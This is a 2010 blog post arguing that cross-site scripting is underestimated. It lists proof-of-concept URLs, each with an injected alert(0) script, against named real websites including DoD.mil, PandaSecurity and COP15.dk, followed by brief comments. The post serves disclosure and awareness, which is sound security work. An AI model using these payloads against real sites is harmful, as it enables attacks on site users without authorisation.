Insecurity Issues at its Best
[Cross Site Scripting should always be taken seriously even though it is merely a client-side attack]
On today's Internet there are many developers, administrators and even IT-security consultants who
don't consider Cross Site Scripting (XSS) a serious threat. It is truly amazing how many sites still
contain this class of security bug, which has existed for years.
With XSS attacks it is possible to use JavaScript to read the HTML code of the page, and thereby also the
CSRF tokens meant to prevent request forgery. In fact, with today's increasingly advanced XSS worms, only
the attacker's imagination and skills set the limit.
Cross Site Scripting becomes truly dangerous when combined with, for example, browser exploitation, phishing
or perhaps propaganda. All it requires is a user (the victim) clicking a maliciously crafted URL.
In the following proof of concept, sites that should have been secure are disclosed, showing that
even these contain this kind of security bug even though they shouldn't.
Proof of Concept
TechWorld:
http://search.techworld.com/search/?intcmp=ros-hd-srch&q=%3Cbody%20onload=%22alert(0)%22%3E
COP15.dk:
1. http://en.cop15.dk/frontpage/access/login?orgurl=data:text/html,<script>alert(0)</script>
2. http://www1.cop15.meta-fusion.com/kongresse/cop15/templ/ovw.php?id_kongressmain=1&theme=<script>alert(0)</script>
Social-Engineer.org:
- XSS in a plugin which I made an advisory for.
DoD.mil:
https://metadata.dod.mil/mdr/documents.htm?page=<script>alert(0)</script>
PandaSecurity.com:
http://www.pandasecurity.com/sitesearch/?hl=es&lr=lang_es&nq=site%3awww.pandasecurity.com %2fspain%2f&term=%27;alert(0);a%3D%27/
Orbasoft:
http://ftp.orbasoft.com/livezilla/livezilla.php?%27%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
PET.dk:
http://www.pet.dk/Main.aspx?path=/<script>alert(0)</script>
Conclusion
All of the above sites have, or have had, these vulnerabilities for over 2 months.
They have also been notified and will hopefully fix these vulnerabilities soon, if they haven't already.
Since only very few of the above sites run open-source software, we only supplied a patch to 1 of them.
There were a lot more sites that were originally part of the list, but we decided to remove them and
only write about those we thought would be the most critical.
~ MaXe
Comments (3)
Posted 6th February 2010 at 12:04 by eXeDK
Posted 7th February 2010 at 16:20 by MaXe
Yep, true. XSS is being underestimated a lot by people who don't know it could do great damage, not to the server, but to the users.
Posted 8th February 2010 at 09:19 by zer0bytes